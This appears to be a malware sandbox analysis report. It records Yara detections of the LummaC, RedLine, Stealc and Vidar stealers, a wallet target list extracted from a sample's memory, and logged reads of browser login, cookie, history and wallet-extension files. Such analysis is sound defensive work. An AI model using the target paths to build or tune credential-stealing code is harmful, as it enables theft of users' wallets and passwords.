Source: Yara match	File source: 00000002.00000003.2158174762.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2626880890.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2158216245.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2087722610.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2198511022.0000000000261000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d0d468f327.exe PID: 5168, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: 22.2.myrdx.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.2910389172.00000000002AC000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3026057510.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: myrdx.exe PID: 4196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3524, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 14.0.stealc_default2.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.stealc_default2.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.4ad48d7d65.exe.440000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.3052484261.0000000004F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3142776921.0000000000441000.00000040.00000001.01000000.00000023.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2686160117.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2886105690.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 5864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4ad48d7d65.exe PID: 1600, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 5864, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: Electrum
Source: stealc_default2.exe, 0000000E.00000002.2886105690.00000000007E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: \Electrum\wallets\
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: window-state.json
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: Jaxx Desktop (old)
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: exodus.conf.json
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: \Exodus\
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: info.seco
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: ElectrumLTC
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: passphrase.json
Source: stealc_default2.exe, 0000000E.00000002.2886105690.00000000007E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: \Ethereum\
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: Exodus
Source: stealc_default2.exe, 0000000E.00000002.2886105690.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: Ethereum
Source: stealc_default2.exe, 0000000E.00000002.2886105690.00000000007E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 0000000E.00000002.2886105690.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\.7
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: stealc_default2.exe, 0000000E.00000002.2886105690.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\MultiDoge\\multidoge.wallet
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: seed.seco
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: keystore
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: \Electrum-LTC\wallets\
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
